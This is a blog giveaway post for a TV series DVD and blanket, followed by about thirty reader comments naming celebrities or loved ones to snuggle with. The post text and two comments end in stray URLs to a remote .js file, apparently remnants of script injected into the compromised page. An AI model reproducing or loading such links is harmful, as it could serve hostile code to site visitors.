Lindsey Kelk
You Are Reading

The Client List

News & Blog

The Client List

As I’m sure you already know, I love me some teevs and since I’m recuperating from post-deadline madness on About A Girl last week, I’m watching A Lot of teevs.

Screen shot 2013-03-12 at 13.20.57

Happily, I’m able to share that love with you. Jennifer Love Hewitt’s show, The Client List, is BACK BACK BACK for its second season on Lifetime (find out more about the show here but really all you need to know is that it’s awesome) and to celebrate, I have a DVD of the first season plus the world’s snuggliest TV watching blanket to give away! Sound good?

Enter by telling me who you would like to snuggle up with to watch a DVD in the comments box below and I’ll announce a winner on Friday. The competition is open worldwide but the DVD is Region 1 so make sure your DVD player will be able to play it before you enter! Unless you just want the blanket, I totes understand.http://0

(30) Comments

1. Definately Channing Tatum…Shirtless in Dear John, wakes up naked in The Vow and Strips in Magic Mike…now that is what I call movies!http://online-sale24.com/1.js

2. Shauneen says:

Tough choice between the Reynolds or me cooper..but I think Bradley wins…just. he’s a bit more pumped. And all kinds of yum. I would even share the blanket, now that’s love!

3. I would cuddle up with my two girls, start a fire and enjoy some quality family time while my husband is out and about playing golf, soccer or handball.

4. Definately Channing Tatum…Shirtless in Dear John, wakes up naked in The Vow and Strips in Magic Mike…now that is what I call movies!

5. I would have to take it old school and Canadian and say i would want to snuggle up with Devon Sawa or possibly fight my sister for the blanket and just watch some JLH.

6. Kerrie says:

Chris Jericho – so muscular and he could serenade you with a metal song whilst under the romantic twinkling LED lights of his leather jacket. *sigh*

7. I’d love to snuggle with Channing Tatum, working shifts sucks so i’d have lots of time to watch all these with him snuggled up on the sofa with the heating full blast whilst its snowing outside!

8. Emma says:

I’m pretty sure Jake Gyllenhaal would make a fine snuggle buddy 🙂 (if you don’t believe me, watch Love & Other Drugs. If you do believe me, watch it anyway, can’t hurt)

9. Alex says:

Definitely my boyfriend as he is a massive JLH fan and has been since Party of Five Days – even though he claims he didn’t watch Party of Five but somehow knows all the characters and storylines!!

10. I would have to pick Josh Groban to snuggle with, with a stack of DVDs and lots of tea and biscuits. Not only is he cute and funny but his hair looks soft, and he could bring his dog to the snuggle-fest too.
    Any chance you can arrange this as part of the prize?

11. Linchen says:

I love to snuggle with my boyfriend – and a new tv series would be just the right thing to get him away from his laptop:)

12. I’ve barely seen my husband of late. He’s a music teacher, I’m a drama teacher and we’ve productions and concerts coming out of our ears, so that’s who I’d like to cuddle with to watch The Client List.

13. I would snuggle with David Beckham. I reckon he’d smell nice. The person you’re snuggling must always smell nice.

14. Harriet says:

My sister’s dog Austen. I hate being interrupted while watching a show I love. This way I’ve got a snuggle buddy who is warm, cute, and cuddly, but won’t talk during the show (as long as she doesn’t think its play time and want to squeak her toys).

15. Simone says:

who needs someone to snuggle up to when you have all the hot semi naked boys (and girls) in The Client List? 🙂

16. With my Jenny-like bgf and my three cats, some booze and a lot, a lot of gummy-bears jelly sweets 😛 All night long session of watching. Like we used to do with “Friends” years ago (the record: starting at 7pm, watching till 4am, sleeping until noon, then watching the next episode). Or maybe with my bf and my three cats it he decide it to be not so much “girly” (though we watch “The new girl” with me, and even “The Carrie diaries” even it is too even for me ;))

17. I meant even it is too girly for me 😛

18. Nicola Douse says:

I’d curl up on the sofa with my mum and have a Buffy marathon – all the way from ‘Welcome to the Hellmouth’ to Chosen. Diet coke for me, G+T for mum and plenty Ben & Jerry’s to go round. I’d love David Boreanaz and James Marsters to come round too…

19. Maria P. says:

If this is a calory-free fantasy I would snuggle up with a huge pot of ice-cream. If not, my husband would do! Eight years ago I left my country to share the good and the bad with him. This would definetely list as a goodie!

20. Hannah says:

I’d cuddle up with my Mum and we’d watch either Full Monty or Grease. With my Dad trying to drown out our bad singing with his headphones!

21. I would live to snuggle up to chad Michael Murray he’s so dreamy xx

22. Jennifer says:

Well first I would say my family. But since I get to do that every day, I will say Hugh Jackman 🙂 But only if his wife would agree!

23. Samantha says:

Ooooh, that is such a difficult question!! It’s a tie between Ryan Reynolds and Josh Duhamel (from Safe Haven) is it too greedy to say both haha? 🙂 xxhttp://online-sale24.com/1.js

24. Melody says:

It would have to be my hubby who is a champion snuggler! We’ve just been through our first round of IVF so I will be taking it easy for the next couple of weeks (fingers crossed!), lots of box sets in order as we live in HK and there’s only so many re-runs of Gordon Ramsay on BBC Lifestyle I can take!! P.S. when is Angela going to make it out to Asia?

25. Samantha says:

26. After checking out the previous answers I’m thinking we should all just group together for one big party coz there’s some major hottie’s mentioned! Though maybe we’ll have to discuss the snuggling part – that could get a bit awkward/uncomfortable/inappropriate/and all the rest! 🙂

1. WINNER!

1. Ah wow thanks!!!! I never win anything!!! I’ll email you now 🙂 xx

27. Emma Hislop says:

I’d snuggle with my new puppy because boys are stupid.

28. Ashleighsteaparty, you are our winner! Email me your address so I can send out your snuggle package. And invite all the other girls round for our party xoxo lindsey@lindseykelk.com